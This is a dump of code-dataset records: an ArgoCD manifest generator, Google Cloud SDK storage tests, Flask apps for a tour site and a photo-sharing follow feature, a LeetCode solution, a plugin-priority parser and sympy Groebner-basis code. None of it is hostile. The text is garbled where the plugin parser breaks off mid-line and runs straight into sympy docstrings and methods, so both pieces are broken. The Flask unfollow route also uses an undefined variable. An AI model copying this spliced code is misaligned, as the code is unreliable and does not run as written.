self.root.spec.namespaceResourceBlacklist = (\n argocd_project.namespace_resource_blacklist\n )\n\n # Deny all namespaced-scoped resources from being created, except for Deployment and StatefulSet\n if argocd_project.namespace_resource_whitelist:\n self.root.spec.namespaceResourceWhitelist = (\n argocd_project.namespace_resource_whitelist\n )\n\n # Enables namespace orphaned resource monitoring.\n if argocd_project.orphaned_resources:\n self.root.spec.orphanedResources = argocd_project.orphaned_resources\n\n # Roles\n if argocd_project.roles:\n self.root.spec.roles = argocd_project.roles\n\n\nclass ArgoCDApplication(k8s.Base):\n def new(self):\n self.need(\"name\")\n self.kwargs.apiVersion = \"argoproj.io/v1alpha1\"\n self.kwargs.kind = \"Application\"\n\n # Add a this finalizer ONLY if you want these to cascade delete\n\n # self.kwargs.finalizers = list('resources-finalizer.argocd.argoproj.io')\n super().new()\n\n def body(self):\n super().body()\n\n # You'll usually want to add your resources to the argocd namespace.\n self.add_namespace(inv.parameters.argocd_namespace)\n\n argocd_application = self.kwargs.argocd_application\n\n self.add_annotations(argocd_application.get(\"annotations\", {}))\n self.add_labels(argocd_application.get(\"labels\", {}))\n\n # The project the argocd_application belongs to.\n self.root.spec.project = argocd_application.project\n\n # The destination in which Namespace the application should be deployed\n self.root.spec.destination = argocd_application.destination\n\n # Source of the application manifests\n if argocd_application.source:\n self.root.spec.source = argocd_application.source\n\n # Sync policy\n if argocd_application.sync_policy:\n self.root.spec.syncPolicy = argocd_application.sync_policy\n\n # Ignore differences at the specified json pointers\n if argocd_application.ignore_differences:\n self.root.spec.ignoreDifferences = argocd_application.ignore_differences\n\n\n# The following classes are required to generate Secrets + ConfigMaps\n# TODO: Imported from k8s-generator\nclass SharedConfig:\n \"\"\"Shared class to use for both Secrets and ConfigMaps classes.\n\n contain anything needed by both classes, so that their behavious is basically the same.\n Each subclass will then implement its own way of adding the data depending on their implementation.\n \"\"\"\n\n @staticmethod\n def encode_string(unencoded_string):\n return base64.b64encode(unencoded_string.encode(\"ascii\")).decode(\"ascii\")\n\n def setup_metadata(self):\n self.add_namespace(inv.parameters.argocd_namespace)\n self.add_annotations(self.config.annotations)\n self.add_labels(self.config.labels)\n\n self.items = self.config[\"items\"]\n try:\n if isinstance(self, ConfigMap):\n globals = (\n inv.parameters.generators.manifest.default_config.globals.config_maps\n )\n else:\n globals = (\n inv.parameters.generators.manifest.default_config.globals.secrets\n )\n self.add_annotations(globals.get(\"annotations\", {}))\n self.add_labels(globals.get(\"labels\", {}))\n except AttributeError:\n pass\n\n self.versioning(self.config.get(\"versioned\", False))\n\n def add_directory(self, directory, encode=False):\n stringdata = inv.parameters.get(\"use_tesoro\", False)\n if directory and os.path.isdir(directory):\n for filename in os.listdir(directory):\n with open(f\"{directory}/{filename}\", \"r\") as f:\n file_content = f.read()\n self.add_item(\n filename,\n file_content,\n request_encode=encode,\n stringdata=stringdata,\n )\n\n def add_data(self, data):\n stringdata = inv.parameters.get(\"use_tesoro\", False)\n\n for key, spec in data.items():\n encode = spec.get(\"b64_encode\", False)\n\n if \"value\" in spec:\n value = spec.get(\"value\")\n if \"template\" in spec:\n value = j2(spec.template, spec.get(\"values\", {}))\n if \"file\" in spec:\n with open(spec.file, \"r\") as f:\n value = f.read()\n\n self.add_item(key, value, request_encode=encode, stringdata=stringdata)\n\n def add_string_data(self, string_data, encode=False):\n stringdata = True\n\n for key, spec in string_data.items():\n\n if \"value\" in spec:\n value = spec.get(\"value\")\n if \"template\" in spec:\n value = j2(spec.template, spec.get(\"values\", {}))\n if \"file\" in spec:\n with open(spec.file, \"r\") as f:\n value = f.read()\n\n self.add_item(key, value, request_encode=encode, stringdata=stringdata)\n\n def versioning(self, enabled=False):\n if enabled:\n self.hash = hashlib.sha256(str(self.root.to_dict()).encode()).hexdigest()[\n :8\n ]\n self.root.metadata.name += f\"-{self.hash}\"\n\n\n# TODO: Imported from k8s-generator\nclass ConfigMap(k8s.Base, SharedConfig):\n def new(self):\n self.kwargs.apiVersion = \"v1\"\n self.kwargs.kind = \"ConfigMap\"\n super().new()\n\n def body(self):\n super().body()\n\n def add_item(self, key, value, request_encode=False, stringdata=False):\n encode = request_encode\n\n self.root[\"data\"][key] = self.encode_string(value) if encode else value\n\n\n# TODO: Imported from k8s-generator\nclass ComponentConfig(ConfigMap, SharedConfig):\n def new(self):\n super().new()\n self.need(\"config\")\n\n def body(self):\n super().body()\n self.config = self.kwargs.config\n\n self.setup_metadata()\n self.add_data(self.config.data)\n self.add_directory(self.config.directory, encode=False)\n\n\nclass Secret(k8s.Base):\n def new(self):\n self.kwargs.apiVersion = \"v1\"\n self.kwargs.kind = \"Secret\"\n super().new()\n\n def body(self):\n super().body()\n\n def add_item(self, key, value, request_encode=False, stringdata=False):\n encode = not stringdata and request_encode\n field = \"stringData\" if stringdata else \"data\"\n self.root[field][key] = self.encode_string(value) if encode else value\n\n\nclass ComponentSecret(Secret, SharedConfig):\n def new(self):\n super().new()\n self.need(\"config\")\n\n def body(self):\n super().body()\n self.config = self.kwargs.config\n self.root.type = self.config.get(\"type\", \"Opaque\")\n\n self.setup_metadata()\n if self.config.data:\n self.add_data(self.config.data)\n if self.config.string_data:\n self.add_string_data(self.config.string_data)\n self.add_directory(self.config.directory, encode=True)\n\n\n# This function renderes an ArgoCD-AppProject\ndef generate_argocd_appproject(input_params):\n obj = BaseObj()\n bundle = list()\n argocd_projects = inv.parameters.argocd_projects\n for name in argocd_projects.keys():\n argocd_project = ArgoCDAppProject(\n name=name, argocd_project=argocd_projects[name]\n )\n\n obj.root[\"{}-argo-appproject\".format(name)] = argocd_project\n\n return obj\n\n\n# This function renderes an ArgoCD-Application\ndef generate_argocd_application(input_params):\n obj = BaseObj()\n bundle = list()\n argocd_applications = inv.parameters.argocd_applications\n for name in argocd_applications.keys():\n argocd_application = ArgoCDApplication(\n name=name, argocd_application=argocd_applications[name]\n )\n\n obj.root[\"{}-argo-application\".format(name)] = argocd_application\n\n return obj\n\n\n# This function renderes an Shared-ConfigMaps + Secrets\ndef generate_resource_manifests(input_params):\n obj = BaseObj()\n\n for secret_name, secret_spec in inv.parameters.generators.argocd.secrets.items():\n name = secret_spec.get(\"name\", secret_name)\n secret = ComponentSecret(name=name, config=secret_spec)\n obj.root[f\"{name}\"] = secret\n\n for config_name, config_spec in inv.parameters.generators.argocd.configs.items():\n name = config_spec.get(\"name\", config_name)\n config = ComponentConfig(name=name, config=config_spec)\n obj.root[f\"{name}\"] = config\n\n return obj\n\n\n# This function renderes all previous defined functions and returns\ndef generate_manifests(input_params):\n all_manifests = BaseObj()\n\n argocd_project_manifests = generate_argocd_appproject(input_params)\n argocd_application_manifests = generate_argocd_application(input_params)\n resource_manifests = generate_resource_manifests(input_params)\n\n all_manifests.root.update(argocd_project_manifests.root)\n all_manifests.root.update(argocd_application_manifests.root)\n all_manifests.root.update(resource_manifests.root)\n\n return all_manifests\n\n\ndef main(input_params):\n whitelisted_functions = [\"generate_manifests\"]\n function = input_params.get(\"function\", \"generate_manifests\")\n if function in whitelisted_functions:\n return globals()[function](input_params)\n","sub_path":"components/generators/argocd/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"360408443","text":"# -*- coding: utf-8 -*- #\n# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for googlecloudsdk.api_lib.storage.storage_api.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport os\nimport re\n\nfrom apitools.base.py.testing import mock as api_mock\n\nfrom googlecloudsdk.api_lib.storage import storage_api\nfrom googlecloudsdk.api_lib.storage import storage_util\nfrom googlecloudsdk.api_lib.util import apis as core_apis\nfrom googlecloudsdk.calliope import exceptions\nfrom tests.lib import sdk_test_base\nfrom tests.lib import test_case\nfrom tests.lib.apitools import http_error\nfrom tests.lib.surface.app import cloud_storage_util\n\n\nclass GetObjectTest(sdk_test_base.SdkBase):\n\n _OBJECT = storage_util.ObjectReference.FromUrl('gs://mybucket/myobject')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = core_apis.GetMessagesModule('storage', 'v1')\n\n def testGetObject(self):\n self.apitools_client.objects.Get.Expect(\n self.storage_msgs.StorageObjectsGetRequest(\n bucket='mybucket', object='myobject'),\n self.storage_msgs.Object(name='myobject'))\n\n self.assertEqual(\n self.storage_client.GetObject(self._OBJECT),\n self.storage_msgs.Object(name='myobject'))\n\n\nclass CopyFileTest(sdk_test_base.SdkBase):\n\n _BUCKET = storage_util.BucketReference.FromBucketUrl('gs://mybucket/')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = core_apis.GetMessagesModule('storage', 'v1')\n\n self.object_name = 'foobar'\n self.target_path = 'mytargetpath'\n self.local_path = self.Touch(\n self.temp_path, self.object_name, contents='somecontentshere')\n self.file_size = os.path.getsize(self.local_path)\n self.insert_request = self.storage_msgs.StorageObjectsInsertRequest(\n bucket=self._BUCKET.bucket,\n name=self.target_path,\n object=self.storage_msgs.Object(size=self.file_size)\n )\n\n def testSuccess(self):\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n self.storage_msgs.Object(size=self.file_size)\n )\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n exception=exception\n )\n\n with self.assertRaisesRegex(\n exceptions.BadFileException,\n r'Could not copy \\[{}\\] to \\[{}\\]. Please retry: Invalid request API '\n r'reason: Invalid request.'.format(\n re.escape(self.local_path), self.target_path)):\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n def testSizeMismatch(self):\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n # Return an object with a different size.\n self.storage_msgs.Object(size=self.file_size - 1)\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n\nclass CopyFileFromGCSTest(sdk_test_base.WithFakeAuth):\n\n _BUCKET = storage_util.BucketReference.FromBucketUrl('gs://mybucket/')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = self.apitools_client.MESSAGES_MODULE\n\n self.object_name = 'foobar'\n self.target_path = 'mytargetpath'\n self.local_path = os.path.join(self.temp_path, self.object_name)\n self.get_request = self.storage_msgs.StorageObjectsGetRequest(\n bucket=self._BUCKET.bucket,\n object=self.target_path)\n\n def testSuccess(self):\n # TODO(b/33202933): There's a TODO in the apitools testing code to add\n # support for upload/download in mocked apitools clients; when that is\n # resolved, test a non-empty mocked file here.\n # Use object() instead of None because when the mock is given None, it uses\n # a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n self.storage_msgs.Object(size=0))\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n exception=exception\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n def testSizeMismatch(self):\n # Use object() instead of None because when the mock is given None, it uses\n # a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n # Return an object with a different size.\n self.storage_msgs.Object(size=-1))\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n\nclass ReadObjectTest(sdk_test_base.WithFakeAuth):\n\n _OBJECT = storage_util.ObjectReference.FromUrl('gs://bucket/object')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = self.apitools_client.MESSAGES_MODULE\n\n self.get_request = self.storage_msgs.StorageObjectsGetRequest(\n bucket='bucket',\n object='object')\n\n def testSuccess(self):\n # TODO(b/33202933): There's a TODO in the apitools testing code to add\n # support for upload/download in mocked apitools clients; when that is\n # resolved, test a non-empty mocked file here.\n # Use object() instead of None because when the mock is given None, it uses\n # a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.assertEqual(\n self.storage_client.ReadObject(self._OBJECT).read(),\n b'')\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n exception=exception\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.ReadObject(self._OBJECT)\n\n\nclass ListBucketTest(cloud_storage_util.WithGCSCalls):\n\n _BUCKET_NAME = 'testbucket'\n\n _SHA1_SUMS = {\n 'content': '040f06fd774092478d450774f5ba30c5da78acc8',\n 'content2': '6dc99d4757bcb35eaaf4cd3cb7907189fab8d254',\n 'content3': '32c5ff3108bcea43b1c4826d66f43a3ae570e663'\n }\n\n def SetUp(self):\n self.bucket = storage_util.BucketReference.FromBucketUrl(\n 'gs://{0}/'.format(self._BUCKET_NAME))\n self.storage_client = storage_api.StorageClient()\n\n def testListBucket(self):\n self.ExpectList([('a', 'content'), ('b', 'content'), ('c', 'content2')])\n\n names = set(o.name for o in self.storage_client.ListBucket(self.bucket))\n self.assertEqual(\n names,\n set([self._SHA1_SUMS['content'], self._SHA1_SUMS['content2']]))\n\n def testListBucketMultiplePages(self):\n self.ExpectListMulti([\n [('a', 'content'), ('b', 'content')],\n [('c', 'content2'), ('d', 'content3')]])\n names = set(o.name for o in self.storage_client.ListBucket(self.bucket))\n self.assertEqual(\n names,\n set([self._SHA1_SUMS['content'], self._SHA1_SUMS['content2'],\n self._SHA1_SUMS['content3']]))\n\n\nclass DeleteBucketTest(test_case.TestCase):\n\n _BUCKET_NAME = 'testbucket'\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n\n def testDeleteBucket(self):\n bucket = storage_util.BucketReference.FromBucketUrl(\n 'gs://{0}/'.format(self._BUCKET_NAME))\n self.apitools_client.buckets.Delete.Expect(\n self.apitools_client.MESSAGES_MODULE.StorageBucketsDeleteRequest(\n bucket=self._BUCKET_NAME),\n self.apitools_client.MESSAGES_MODULE.StorageBucketsDeleteResponse()\n )\n\n self.storage_client.DeleteBucket(bucket)\n","sub_path":"google-cloud-sdk/lib/tests/unit/api_lib/storage/storage_api_test.py","file_name":"storage_api_test.py","file_ext":"py","file_size_in_byte":10181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"619496392","text":"from random import sample\r\nfrom flask import Flask, render_template\r\nfrom data import *\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef main():\r\n random_tours = {}\r\n rand_list = sample(range(1,tours.__len__()), 6) #генерирую 6 случайных значений без повторений\r\n for i in rand_list:\r\n random_tours[i] = tours[i]\r\n\r\n template_context = dict(title=title, subtitle=subtitle, description=description, tours=random_tours, departures=departures)\r\n output = render_template(\"index.html\", **template_context)\r\n return output\r\n\r\n@app.route('/departures/')\r\ndef show_dep(departure):\r\n\r\n tours_by_dep = {}\r\n for ind, tour in tours.items():\r\n if tour['departure'] == departure:\r\n tours_by_dep[ind] = tour\r\n\r\n tours_count = tours_by_dep.__len__()\r\n\r\n min_price = min(tours_by_dep.values(), key=lambda k: k['price'])['price']\r\n max_price = max(tours_by_dep.values(), key=lambda k: k['price'])['price']\r\n min_days = min(tours_by_dep.values(), key=lambda k: k['nights'])['nights']\r\n max_days = max(tours_by_dep.values(), key=lambda k: k['nights'])['nights']\r\n\r\n template_context = dict(departures=departures, title=title, departure=departure, selected_tours=tours_by_dep, tours_count=tours_count, min_price=min_price, max_price=max_price, min_days=min_days, max_days=max_days)\r\n output = render_template(\"departure.html\", **template_context)\r\n return output\r\n\r\n@app.route('/tours/')\r\ndef show_tour(id):\r\n tour = tours[int(id)]\r\n output = render_template(\"tour.html\", departures=departures, title=title, tour=tour)\r\n return output\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"254221254","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\n给定一个正整数 n ,输出外观数列的第 n 项。\n\n「外观数列」是一个整数序列,从数字 1 开始,序列中的每一项都是对前一项的描述。\n\n你可以将其视作是由递归公式定义的数字字符串序列:\n\ncountAndSay(1) = \"1\"\ncountAndSay(n) 是对 countAndSay(n-1) 的描述,然后转换成另一个数字字符串。\n前五项如下:\n\n1. 1\n2. 11\n3. 21\n4. 1211\n5. 111221\n第一项是数字 1 \n描述前一项,这个数是 1 即 “ 一 个 1 ”,记作 \"11\"\n描述前一项,这个数是 11 即 “ 二 个 1 ” ,记作 \"21\"\n描述前一项,这个数是 21 即 “ 一 个 2 + 一 个 1 ” ,记作 \"1211\"\n描述前一项,这个数是 1211 即 “ 一 个 1 + 一 个 2 + 二 个 1 ” ,记作 \"111221\"\n要 描述 一个数字字符串,首先要将字符串分割为 最小 数量的组,每个组都由连续的最多 相同字符 组成。然后对于每个组,先描述字符的数量,然后描述字符,形成一个描述组。要将描述转换为数字字符串,先将每组中的字符数量用数字替换,再将所有描述组连接起来。\n\n例如,数字字符串 \"3322251\" 的描述如下图:\n\n\n \n\n示例 1:\n\n输入:n = 1\n输出:\"1\"\n解释:这是一个基本样例。\n示例 2:\n\n输入:n = 4\n输出:\"1211\"\n解释:\ncountAndSay(1) = \"1\"\ncountAndSay(2) = 读 \"1\" = 一 个 1 = \"11\"\ncountAndSay(3) = 读 \"11\" = 二 个 1 = \"21\"\ncountAndSay(4) = 读 \"21\" = 一 个 2 + 一 个 1 = \"12\" + \"11\" = \"1211\"\n \n\n提示:\n\n1 <= n <= 30\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/count-and-say\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n \n\n提示:\n\n1 <= n <= 30\n\n\n固定的数组的生成:\n- 第一个数字固定为1\n- 后面的数字依次为上一个数字序列的读法\n\n思路:\n\"\"\"\n\nimport doctest\n\n\nclass Solution:\n \"\"\"\n >>> s = Solution()\n >>> s.countAndSay(1)\n '1'\n >>> s.countAndSay(4)\n '1211'\n \"\"\"\n\n def countAndSay(self, n: int) -> str:\n s = \"1\"\n # 第一次遍历一次次的生成\n for j in range(1, n):\n t = s[0]\n tmp = \"\"\n count = 0 # 统计重复出现的数字的个数\n # 用来遍历每一次的数字,统计其读法\n for i in range(0, len(s), 1):\n if t == s[i]:\n count += 1\n else:\n tmp = tmp + str(count) + t\n t = s[i]\n count = 1\n if i == len(s) - 1:\n tmp = tmp + str(count) + t # 将结果合并\n s = tmp\n return s\n\n\nif __name__ == \"__main__\":\n doctest.testmod()\n","sub_path":"algorithms/leetcode/medium/0038_外观数列.py","file_name":"0038_外观数列.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"103194456","text":"from flask import Blueprint, render_template, request, url_for, redirect, flash\nfrom models.user import User\nfrom models.images import Image\nfrom models.following import Following\nfrom flask_login import current_user\n\nfollows_blueprint = Blueprint(\"follows\",\n __name__,\n template_folder='templates')\n\n\n@follows_blueprint.route('/', methods=['POST'])\ndef create(idol_id):\n idol = User.get_or_none(User.id == idol_id)\n\n if not idol:\n flash('No user found with this id')\n return redirect(url_for('sessions.index'))\n # modify this to show homepage HOME in sessions\n\n new_follow = Following(fan_id=current_user.id, idol_id=idol.id)\n\n if not new_follow.save():\n flash('Error in following this user', 'warning')\n return redirect(url_for('users.show', username=idol.username))\n\n else:\n flash(f'You are now following {idol.username}')\n return redirect(url_for('users.show', username=idol.username))\n\n flash('Following request has sent ! Please wait for approval.')\n\n\n@follows_blueprint.route('//delete', methods=['POST'])\ndef delete(idol_id):\n follow = Following.get_or_none(Following.idol_id == idol.id) and (\n Following.fan_id == current_user.id)\n\n if follow.delete_instance():\n flash(f'You have unfollowed {follow.idol.username}')\n return redirect(url_for('users.show', username=follow.idol.username))\n","sub_path":"instagram_web/blueprints/follows/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"492125369","text":"import glob\nimport os\nfrom logs import logs as log\nlogs=log()\ndef qparse(questionlist):\n\tdef checkdicts(checkvar, plugin):\n\t\tplugvals=plugin.values()[0]\n\t\tfor plugdict in plugvals:\n\t\t\tlogs.write(\"Checking dictionary {0}\".format(plugdict),'trying')\n\t\t\tif plugdict.keys()[0]==checkvar:\n\t\t\t\tlogs.write(\"Found {0} dictionary\".format(checkvar), 'success')\n\t\t\t\tcheckval=plugdict.values()[0]\n\t\t\t\treturn checkval\n\tlogs.write(\"Parsing possible plugins\", 'trying')\n\tpriority=open('priority.txt').read().split('\\n')\n\tprioritized=[]\n\tfor plugin in questionlist:\n\t\tplugname=plugin.keys()[0]\n\t\tlogs.write(\"Checking plugin {0}\".format(plugname), 'working')\n\t\tlogs.write(\"Checking to see if the plugin is in the priority list\", 'working')\n\t\tplugname=plugin.keys()[0]\n\t\tfor line in priority:\n\t\t\tname=line.split(':')[1]\n\t\t\tstatus=line.split(':')[0]\n\t\t\tlogs.write('Item {0} in priority list is {1}'.format(status, name), 'working')\n\t\t\tif plugname.lower()==name.lower():\n\t\t\t\tlogs.write(\"Plugin name and priority list item match\", 'success')\n\t\t\t\tprioritized.append({status:plugin})\n\tlogs.write(\"Going through list of prioritized plugins\", 'trying')\n\tlogs.write(prioritized, 'working')\n\tnum=None\n\tfor plugin in prioritized:\n\t\tlogs.write(\"Looking at plugin {0}\".format(plugin), 'working')\n\t\tstatus=plugin.keys()[0]\n\t\tplugname=plugin.values()[0].keys()[0]\n\t\tlogs.write(\"Plugin {0} has priority {1}\".format(plugname,status), 'working')\n\t\tstatus=int(status)\n\t\tif num==None:\n\t\t\tnum=status\n\t\telse:\n\t\t\tif status>> from sympy.abc import x, y\r\n >>> from sympy import groebner\r\n\r\n >>> F = [x**2 - 3*y - x + 1, y**2 - 2*x + y - 1]\r\n >>> G = groebner(F, x, y, order='grlex')\r\n\r\n >>> list(G.fglm('lex'))\r\n [2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7]\r\n >>> list(groebner(F, x, y, order='lex'))\r\n [2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7]\r\n\r\n References\r\n ==========\r\n\r\n J.C. Faugere, P. Gianni, D. Lazard, T. Mora (1994). Efficient\r\n Computation of Zero-dimensional Groebner Bases by Change of\r\n Ordering\r\n\r\n \"\"\"\r\n opt = self._options\r\n\r\n src_order = opt.order\r\n dst_order = monomial_key(order)\r\n\r\n if src_order == dst_order:\r\n return self\r\n\r\n if not self.is_zero_dimensional:\r\n raise NotImplementedError(\"can't convert Groebner bases of ideals with positive dimension\")\r\n\r\n polys = list(self._basis)\r\n domain = opt.domain\r\n\r\n opt = opt.clone(dict(\r\n domain=domain.get_field(),\r\n order=dst_order,\r\n ))\r\n\r\n from sympy.polys.rings import xring\r\n _ring, _ = xring(opt.gens, opt.domain, src_order)\r\n\r\n for i, poly in enumerate(polys):\r\n poly = poly.set_domain(opt.domain).rep.to_dict()\r\n polys[i] = _ring.from_dict(poly)\r\n\r\n G = matrix_fglm(polys, _ring, dst_order)\r\n G = [Poly._from_dict(dict(g), opt) for g in G]\r\n\r\n if not domain.is_Field:\r\n G = [g.clear_denoms(convert=True)[1] for g in G]\r\n opt.domain = domain\r\n\r\n return self._new(G, opt)\r\n\r\n def reduce(self, expr, auto=True):\r\n \"\"\"\r\n Reduces a polynomial modulo a Groebner basis.\r\n\r\n Given a polynomial ``f`` and a set of polynomials ``G = (g_1, ..., g_n)``,\r\n computes a set of quotients ``q = (q_1, ..., q_n)`` and the remainder ``r``\r\n such that ``f = q_1*f_1 + ... + q_n*f_n + r``, where ``r`` vanishes or ``r``\r\n is a completely reduced polynomial with respect to ``G``.\r\n\r\n Examples\r\n ========\r\n\r\n >>> from sympy import groebner, expand\r\n >>> from sympy.abc import x, y\r\n\r\n >>> f = 2*x**4 - x**2 + y**3 + y**2\r\n >>> G = groebner([x**3 - x, y**3 - y])\r\n\r\n >>> G.reduce(f)\r\n ([2*x, 1], x**2 + y**2 + y)\r\n >>> Q, r = _\r\n\r\n >>> expand(sum(q*g for q, g in zip(Q, G)) + r)\r\n 2*x**4 - x**2 + y**3 + y**2\r\n >>> _ == f\r\n True\r\n\r\n \"\"\"\r\n poly = Poly._from_expr(expr, self._options)\r\n polys = [poly] + list(self._basis)\r\n\r\n opt = self._options\r\n domain = opt.domain\r\n\r\n retract = False\r\n\r\n if auto and domain.is_Ring and not domain.is_Field:\r\n opt = opt.clone(dict(domain=domain.get_field()))\r\n retract = True\r\n\r\n from sympy.polys.rings import xring\r\n _ring, _ = xring(opt.gens, opt.domain, opt.order)\r\n\r\n for i, poly in enumerate(polys):\r\n poly = poly.set_domain(opt.domain).rep.to_dict()\r\n polys[i] = _ring.from_dict(poly)\r\n\r\n Q, r = polys[0].div(polys[1:])\r\n\r\n Q = [Poly._from_dict(dict(q), opt) for q in Q]\r\n r = Poly._from_dict(dict(r), opt)\r\n\r\n if retract:\r\n try:\r\n _Q, _r = [q.to_ring() for q in Q], r.to_ring()\r\n except CoercionFailed:\r\n pass\r\n else:\r\n Q, r = _Q, _r\r\n\r\n if not opt.polys:\r\n return [q.as_expr() for q in Q], r.as_expr()\r\n else:\r\n return Q, r\r\n\r\n\r\n def contains(self, poly):\r\n \"\"\"\r\n Check if ``poly`` belongs the ideal generated by ``self``.\r\n\r\n Examples\r\n ========\r\n\r\n >>> from sympy import groebner\r\n >>> from sympy.abc import x, y\r\n\r\n >>> f = 2*x**3 + y**3 + 3*y\r\n >>> G = groebner([x**2 + y**2 - 1, x*y - 2])\r\n\r\n >>> G.contains(f)\r\n True\r\n >>> G.contains(f + 1)\r\n False\r\n\r\n \"\"\"\r\n return self.reduce(poly)[1] == 0\r\n\r\ndef iter_groebner(seq,n, ring, method=None):\r\n \"\"\"\r\n Computes Groebner basis for a set of polynomials in `K[X]`.\r\n\r\n Wrapper around the (default) improved Buchberger and the other algorithms\r\n for computing Groebner bases. The choice of algorithm can be changed via\r\n ``method`` argument or :func:`setup` from :mod:`sympy.polys.polyconfig`,\r\n where ``method`` can be either ``buchberger`` or ``f5b``.\r\n\r\n \"\"\"\r\n\r\n domain, orig = ring.domain, None\r\n if not domain.is_Field or not domain.has_assoc_Field:\r\n try:\r\n orig, ring = ring, ring.clone(domain=domain.get_field())\r\n except DomainError:\r\n raise DomainError(\"can't compute a Groebner basis over %s\" % domain)\r\n else:\r\n seq = [ s.set_ring(ring) for s in seq ]\r\n\r\n G = _incr_buch(seq,n, ring)\r\n\r\n if orig is not None:\r\n G = [ g.clear_denoms()[1].set_ring(orig) for g in G ]\r\n\r\n return G\r\n\r\ndef _incr_buch(f,n, ring):\r\n \"\"\"\r\n Incremental Computation of a reduced Grobner basis, given that f[:-1] is a reduced Grobner basis\r\n and f[-1] is a new polynomial to add into the basis.\r\n New polynomial f[-1] is assumed to be reduced by the grobner basis f[:-1] already.\r\n\r\n \"\"\"\r\n order = ring.order\r\n domain = ring.domain\r\n\r\n monomial_mul = ring.monomial_mul\r\n monomial_div = ring.monomial_div\r\n monomial_lcm = ring.monomial_lcm\r\n\r\n def select(P):\r\n # normal selection strategy\r\n # select the pair with minimum LCM(LM(f), LM(g))\r\n pr = min(P, key=lambda pair: order(monomial_lcm(f[pair[0]].LM, f[pair[1]].LM)))\r\n return pr\r\n\r\n def normal(g, J):\r\n h = g.rem([ f[j] for j in J ])\r\n\r\n if not h:\r\n return None\r\n else:\r\n h = h.monic()\r\n\r\n if not h in I:\r\n I[h] = len(f)\r\n f.append(h)\r\n\r\n return h.LM, I[h]\r\n\r\n def update(G, B, ih):\r\n # update G using the set of critical pairs B and h\r\n # [BW] page 230\r\n h = f[ih]\r\n mh = h.LM\r\n\r\n # filter new pairs (h, g), g in G\r\n C 